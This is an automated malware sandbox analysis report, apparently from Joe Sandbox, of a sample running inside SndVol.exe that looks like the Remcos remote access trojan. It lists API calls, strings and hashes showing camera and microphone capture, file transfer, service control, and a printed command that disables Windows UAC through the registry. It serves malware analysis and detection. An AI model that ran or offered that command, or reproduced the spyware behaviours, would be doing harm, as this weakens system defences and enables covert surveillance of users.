                                                                • ExtractIconA.SHELL32(00000000,?,00000000), ref: 0536E17A
                                                                • lstrcpyn.KERNEL32(00474B60,0046CF34,00000080), ref: 0536E194
                                                                • Shell_NotifyIcon.SHELL32(00000000,00474B48), ref: 0536E1AA
                                                                • TranslateMessage.USER32(?), ref: 0536E1B6
                                                                • DispatchMessageA.USER32(?), ref: 0536E1C0
                                                                • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0536E1CD
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408997863.0000000005350000.00000040.00000400.00020000.00000000.sdmp, Offset: 05350000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_5350000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                                                                • String ID:
                                                                • API String ID: 1970332568-0
                                                                • Opcode ID: e379e7694b2aceffa08d25cf1e7e1f0c4c43df4e14370d432b5b71655a4afb2b
                                                                • Instruction ID: 143623fd5543371f77af5b503548d6e6a9b0ab76e65c1583ea2ce848ba60a919
                                                                • Opcode Fuzzy Hash: e379e7694b2aceffa08d25cf1e7e1f0c4c43df4e14370d432b5b71655a4afb2b
                                                                • Instruction Fuzzy Hash: 3B015271800249EBD7109FA5EC4CFABBB7CEB85B01F004029F515970A0D7B8D885CB58
                                                                APIs
                                                                • __allrem.LIBCMT ref: 0043AC69
                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AC85
                                                                • __allrem.LIBCMT ref: 0043AC9C
                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043ACBA
                                                                • __allrem.LIBCMT ref: 0043ACD1
                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043ACEF
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                • String ID:
                                                                • API String ID: 1992179935-0
                                                                • Opcode ID: 324a3f8db7a4af308d45995ace6313bc09822ddcf2faf4fc4501ccf235525b64
                                                                • Instruction ID: 0cac597ccac2158415e78c81c2c349525783c2449c9f0a8280db41f57d0428da
                                                                • Opcode Fuzzy Hash: 324a3f8db7a4af308d45995ace6313bc09822ddcf2faf4fc4501ccf235525b64
                                                                • Instruction Fuzzy Hash: CC812B72640706ABE7209F29CC41B5BB3A9EF48324F24552FF590D7781EB7CE9108B5A
                                                                APIs
                                                                • __allrem.LIBCMT ref: 0538B936
                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0538B952
                                                                • __allrem.LIBCMT ref: 0538B969
                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0538B987
                                                                • __allrem.LIBCMT ref: 0538B99E
                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0538B9BC
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408997863.0000000005350000.00000040.00000400.00020000.00000000.sdmp, Offset: 05350000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_5350000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                • String ID:
                                                                • API String ID: 1992179935-0
                                                                • Opcode ID: 372230fba1730b24943150f2d9223dcab7b4bce73996abcbaedb59f98a560456
                                                                • Instruction ID: bd3f666cd0ec20ce7431436845718a23da563d06ed05668b87f693c18409cb4d
                                                                • Opcode Fuzzy Hash: 372230fba1730b24943150f2d9223dcab7b4bce73996abcbaedb59f98a560456
                                                                • Instruction Fuzzy Hash: 85811A72B04B179BEB29BE79CC55B7AF3E9EF40720F14452AE561D7680E7B0D9008B50
                                                                APIs
                                                                • Sleep.KERNEL32(00000000,0040D262), ref: 004044C4
                                                                  • Part of subcall function 00404607: __EH_prolog.LIBCMT ref: 0040460C
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: H_prologSleep
                                                                • String ID: CloseCamera$FreeFrame$GetFrame$HNG$OpenCamera
                                                                • API String ID: 3469354165-3054508432
                                                                • Opcode ID: b2183fe930d358898304507f986fb3ab6ddf7ad6d7f92608fdc07342e077fed1
                                                                • Instruction ID: 62663cdee79800d8a54f028f5a980ee1c6790ad11611a7059aef087dab150aaf
                                                                • Opcode Fuzzy Hash: b2183fe930d358898304507f986fb3ab6ddf7ad6d7f92608fdc07342e077fed1
                                                                • Instruction Fuzzy Hash: 5C51E1B1A042116BCA14FB369D0A66E3755ABC5748F00053FFA06677E2EF7C8A45839E
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: __cftoe
                                                                • String ID:
                                                                • API String ID: 4189289331-0
                                                                • Opcode ID: eef5811f0b3e11eaf1bdde4175ac7a9ebfa2f3cd5d18ba66a6432d1456243127
                                                                • Instruction ID: 6c78d09a6f5169ef6f707262af513c71f712f2c279f5202ad8aecd4a6012115a
                                                                • Opcode Fuzzy Hash: eef5811f0b3e11eaf1bdde4175ac7a9ebfa2f3cd5d18ba66a6432d1456243127
                                                                • Instruction Fuzzy Hash: D951EA72900A05ABFF209B59CC81FAF77A9EF49334F14421FF515A6293DB39D900866C
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408997863.0000000005350000.00000040.00000400.00020000.00000000.sdmp, Offset: 05350000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_5350000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: __cftoe
                                                                • String ID:
                                                                • API String ID: 4189289331-0
                                                                • Opcode ID: 9a4a9018df91bb80547d8cd227be064c11647db9cc7a9b7c485a3b8778a52ece
                                                                • Instruction ID: eebb46ae2d44f6db6c136143263412117c967fbb32d86c25ddfb3b3ed789c485
                                                                • Opcode Fuzzy Hash: 9a4a9018df91bb80547d8cd227be064c11647db9cc7a9b7c485a3b8778a52ece
                                                                • Instruction Fuzzy Hash: 715139F6A06205ABDF2C9B688C46EBE77E9FF49370F14421EF815E6181DB71D900CA64
                                                                APIs
                                                                • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00000000,00474EE0,00465FA4,?,00000000,05358CC9,00000000), ref: 05358692
                                                                • WriteFile.KERNEL32(00000000,?,00000000,000186A0,00000000,?,000186A0,?,?,00000000,05358CC9,00000000,?,?,0000000A,00000000), ref: 053586DA
                                                                  • Part of subcall function 0535576E: send.WS2_32(?,00000000,00000000,00000000), ref: 05355803
                                                                • CloseHandle.KERNEL32(00000000,?,00000000,05358CC9,00000000,?,?,0000000A,00000000), ref: 0535871A
                                                                • MoveFileW.KERNEL32(00000000,00000000), ref: 05358737
                                                                • CloseHandle.KERNEL32(00000000,00000057,?,00000008,?,?,?,?,?,?,?,0000000A,00000000), ref: 05358762
                                                                • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,?,0000000A,00000000), ref: 05358772
                                                                  • Part of subcall function 05355863: WaitForSingleObject.KERNEL32(00000000,000000FF,?,00474EF8,05355916,00000000,00000000,00000000,?,00474EF8,?), ref: 05355872
                                                                  • Part of subcall function 05355863: SetEvent.KERNEL32(00000000), ref: 05355890
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408997863.0000000005350000.00000040.00000400.00020000.00000000.sdmp, Offset: 05350000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_5350000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
                                                                • String ID:
                                                                • API String ID: 1303771098-0
                                                                • Opcode ID: 3af979d2a86f55abb037a5ea190009b8bddef8696a723389280064d929b35107
                                                                • Instruction ID: 53f2c879a2114c55c62af1db6262add03a1ee5eac52717662e7142b469e73fc4
                                                                • Opcode Fuzzy Hash: 3af979d2a86f55abb037a5ea190009b8bddef8696a723389280064d929b35107
                                                                • Instruction Fuzzy Hash: 93319F75608341EFC710EF60D888EDBB7A8FF84261F40592DBD8192151DF74AA48CBA6
                                                                APIs
                                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,00000000,?,?,?,0041A38E,00000000), ref: 0041AC88
                                                                • OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,?,?,0041A38E,00000000), ref: 0041AC9C
                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A38E,00000000), ref: 0041ACA9
                                                                • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,0041A38E,00000000), ref: 0041ACDE
                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A38E,00000000), ref: 0041ACF0
                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A38E,00000000), ref: 0041ACF3
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Service$CloseHandle$Open$ChangeConfigManager
                                                                • String ID:
                                                                • API String ID: 493672254-0
                                                                • Opcode ID: efec56fc5935d5a2572c80bdc1daad9799237a8c2fd258714d4154745ff5c6c1
                                                                • Instruction ID: ed0bae8235b77a8e2b5b4951a925fd67a34dfbd091713fce30693036f81a5133
                                                                • Opcode Fuzzy Hash: efec56fc5935d5a2572c80bdc1daad9799237a8c2fd258714d4154745ff5c6c1
                                                                • Instruction Fuzzy Hash: 84014E311452147BD6110B385C4DEFB3B5CDB42771F100317F925922D1EA68CD45B5EE
                                                                APIs
                                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,00000001,?,?,?,?,?,?,0536B153,00000000), ref: 0536B7E9
                                                                • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,0536B153,00000000), ref: 0536B800
                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0536B153,00000000), ref: 0536B80D
                                                                • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0536B153,00000000), ref: 0536B81C
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408997863.0000000005350000.00000040.00000400.00020000.00000000.sdmp, Offset: 05350000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_5350000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Service$Open$CloseControlHandleManager
                                                                • String ID:
                                                                • API String ID: 1243734080-0
                                                                • Opcode ID: 06969d4054276dbf450069cd14adbb04630f9483e2dd0d38d9b092c5558579ee
                                                                • Instruction ID: 5f57eee57a279a499c65489d0a378c5f129256f18b9ffccf568f4694cb483391
                                                                • Opcode Fuzzy Hash: 06969d4054276dbf450069cd14adbb04630f9483e2dd0d38d9b092c5558579ee
                                                                • Instruction Fuzzy Hash: 3511E13190021CBBDB21AF64DCC8DFF7B6DEB42AA2B000539FD05D3191DB648D46AAB1
                                                                APIs
                                                                • GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                                                • _free.LIBCMT ref: 0044824C
                                                                • _free.LIBCMT ref: 00448274
                                                                • SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 00448281
                                                                • SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                                                • _abort.LIBCMT ref: 00448293
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ErrorLast$_free$_abort
                                                                • String ID:
                                                                • API String ID: 3160817290-0
                                                                • Opcode ID: d577d612c1ffbc00090520c66a2c794f4cb9603406b177c38f93d9dbc2276fca
                                                                • Instruction ID: 1e51d54565af68f960eede883612623578b8b4ccb82fc25c91f14e3db4823c68
                                                                • Opcode Fuzzy Hash: d577d612c1ffbc00090520c66a2c794f4cb9603406b177c38f93d9dbc2276fca
                                                                • Instruction Fuzzy Hash: 15F0F935104F006AF611332A6C05B5F2515ABC276AF25066FF92892292DFACCC4581AD
                                                                APIs
                                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,00000001,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAB5
                                                                • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAC9
                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAD6
                                                                • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAE5
                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAF7
                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAFA
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Service$CloseHandle$Open$ControlManager
                                                                • String ID:
                                                                • API String ID: 221034970-0
                                                                • Opcode ID: 4ae3873c1f536b49cfb6b65ca2e5a3703e9976f2291b0d96870e63be56c21842
                                                                • Instruction ID: 651adf303b3d55a6ad93a9774d9c6d096703db2647e4265c62a250da7e042a32
                                                                • Opcode Fuzzy Hash: 4ae3873c1f536b49cfb6b65ca2e5a3703e9976f2291b0d96870e63be56c21842
                                                                • Instruction Fuzzy Hash: 68F0C231541218ABD711AF25AC49EFF3B6CDF45BA2F000026FE0992192DB68CD4695E9
                                                                APIs
                                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABB9
                                                                • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABCD
                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABDA
                                                                • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABE9
                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABFB
                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABFE
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Service$CloseHandle$Open$ControlManager
                                                                • String ID:
                                                                • API String ID: 221034970-0
                                                                • Opcode ID: 81e2b4606ab98421978dc9842ef1edfa46dc1b90a9204ca08327dde20b0592b6
                                                                • Instruction ID: cdcae22f94af1ce7d279f83afe572816001e75aa845eac4345c2c81124f82824
                                                                • Opcode Fuzzy Hash: 81e2b4606ab98421978dc9842ef1edfa46dc1b90a9204ca08327dde20b0592b6
                                                                • Instruction Fuzzy Hash: 84F0C231501218ABD6116F259C49DFF3B6CDB45B62F40002AFE0996192EB38DD4595F9
                                                                APIs
                                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC20
                                                                • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC34
                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC41
                                                                • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC50
                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC62
                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC65
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Service$CloseHandle$Open$ControlManager
                                                                • String ID:
                                                                • API String ID: 221034970-0
                                                                • Opcode ID: fc89c5385e453168767847f65058b20f434ef67782af095c3a641765214ec1d0
                                                                • Instruction ID: 1af6be829003de2eeb85b71d4b0cbdb2c911632148e7083bdbbda8586ff13133
                                                                • Opcode Fuzzy Hash: fc89c5385e453168767847f65058b20f434ef67782af095c3a641765214ec1d0
                                                                • Instruction Fuzzy Hash: 2FF0F631501228BBD711AF25EC49DFF3B6CDB45B62F00002AFE0992192EB38CD4595F9
                                                                APIs
                                                                • RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 05364789
                                                                • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000104,00000000,?,?,?,?), ref: 053647B8
                                                                • RegEnumValueW.ADVAPI32(?,00000000,?,00003FFF,00000000,?,?,00002710,?,?,?,?,?,?,?,?), ref: 05364858
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408997863.0000000005350000.00000040.00000400.00020000.00000000.sdmp, Offset: 05350000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_5350000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Enum$InfoQueryValue
                                                                • String ID: xUG$TG
                                                                • API String ID: 3554306468-3109661684
                                                                • Opcode ID: e28986e9332aa07a6eea5a33b9e26ecc66a365c7f4eba0dbebaa861638ff76d3
                                                                • Instruction ID: 30f453e63ba5ea0257cb6c9b3e68c8c88f3490a6a232e2872f1d645c169196f8
                                                                • Opcode Fuzzy Hash: e28986e9332aa07a6eea5a33b9e26ecc66a365c7f4eba0dbebaa861638ff76d3
                                                                • Instruction Fuzzy Hash: 1B511E72E10219AADF15EB94DC94EEFB7BDFF05310F10416AE906E2154EF706A48CBA1
                                                                APIs
                                                                • __Init_thread_footer.LIBCMT ref: 004018BE
                                                                • ExitThread.KERNEL32 ref: 004018F6
                                                                • waveInUnprepareHeader.WINMM(?,00000020,00000000,?,00000020,00474EE0,00000000), ref: 00401A04
                                                                  • Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
                                                                • String ID: PkG$NG
                                                                • API String ID: 1649129571-2686071003
                                                                • Opcode ID: 751e17220fe7e02abd832392d96957ea80d565c9ec878b7494034c10d7dc528b
                                                                • Instruction ID: 5b8630810f78da979eb204bf693be1d55f2004797ab3201abec5cd50ea38d472
                                                                • Opcode Fuzzy Hash: 751e17220fe7e02abd832392d96957ea80d565c9ec878b7494034c10d7dc528b
                                                                • Instruction Fuzzy Hash: BF41B4312042109BC324FB26DD96ABE73A6AB85314F00453FF54AA61F2DF386D49C75E
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408997863.0000000005350000.00000040.00000400.00020000.00000000.sdmp, Offset: 05350000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_5350000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID: PkGNG
                                                                • API String ID: 0-263838557
                                                                • Opcode ID: 6432c744e00329bb486b15d835566ca43a09715d1a124345af01da605e15d9f5
                                                                • Instruction ID: fe6467e618a11250853fff8233f7962f59545c0602d21cfbb18713bdf1a593c9
                                                                • Opcode Fuzzy Hash: 6432c744e00329bb486b15d835566ca43a09715d1a124345af01da605e15d9f5
                                                                • Instruction Fuzzy Hash: C741EBF1B00704AFDB28AF78C845B6ABBF9EF48711F10496AE155DB680E77199418780
                                                                APIs
                                                                • RegisterClassExA.USER32(00000030), ref: 0041D55B
                                                                • CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041D576
                                                                • GetLastError.KERNEL32 ref: 0041D580
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ClassCreateErrorLastRegisterWindow
                                                                • String ID: 0$MsgWindowClass
                                                                • API String ID: 2877667751-2410386613
                                                                • Opcode ID: a7bf03488480a67a5ab74e572dd3e9b3283d69d087452f3b28ffeaf09d6b5029
                                                                • Instruction ID: 921741f364e14ac5d494c0d6481b3569f22aad0bbfd2e997b493b5423d792a6e
                                                                • Opcode Fuzzy Hash: a7bf03488480a67a5ab74e572dd3e9b3283d69d087452f3b28ffeaf09d6b5029
                                                                • Instruction Fuzzy Hash: 910129B1D00219BBDB00DFD5ECC49EFBBBDEA04355F40053AF900A6240E77859058AA4
                                                                APIs
                                                                • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 0040779B
                                                                • CloseHandle.KERNEL32(?), ref: 004077AA
                                                                • CloseHandle.KERNEL32(?), ref: 004077AF
                                                                Strings
                                                                • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 00407791
                                                                • C:\Windows\System32\cmd.exe, xrefs: 00407796
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CloseHandle$CreateProcess
                                                                • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
                                                                • API String ID: 2922976086-4183131282
                                                                • Opcode ID: 86afbde76f2a9426f4ed7e8e7c7881cd7a3c7ba11745d0fd7a0dc136aa7099f4
                                                                • Instruction ID: bcd6b2dc2297655d1c2a6c7a9d844aadd79638dc8707381bf3a952a3ff6736b4
                                                                • Opcode Fuzzy Hash: 86afbde76f2a9426f4ed7e8e7c7881cd7a3c7ba11745d0fd7a0dc136aa7099f4
                                                                • Instruction Fuzzy Hash: BCF03676D4029D76CB20ABD6DC0EEDF7F7DEBC5B11F00056AF904A6141E6746404C6B9
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID: C:\Windows\SysWOW64\SndVol.exe$Rmc-TLPQMO
                                                                • API String ID: 0-3891208019
                                                                • Opcode ID: a5e5064d23fdb4a5105bb888b891a2001f99cf11455aefb2b8df45e89f9c3324
                                                                • Instruction ID: 1b954d03a55cc3c1a25a26db856d3c6076ddce7f3b9fad0ad77fefb3a3407f05
                                                                • Opcode Fuzzy Hash: a5e5064d23fdb4a5105bb888b891a2001f99cf11455aefb2b8df45e89f9c3324
                                                                • Instruction Fuzzy Hash: 2CF046B0F14A00EBCB0467655D186693A05A740356F404C77F907EA2F2EBBD5C41C61E
                                                                APIs
                                                                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,004432EB,?,?,0044328B,?), ref: 0044335A
                                                                • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0044336D
                                                                • FreeLibrary.KERNEL32(00000000,?,?,?,004432EB,?,?,0044328B,?), ref: 00443390
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AddressFreeHandleLibraryModuleProc
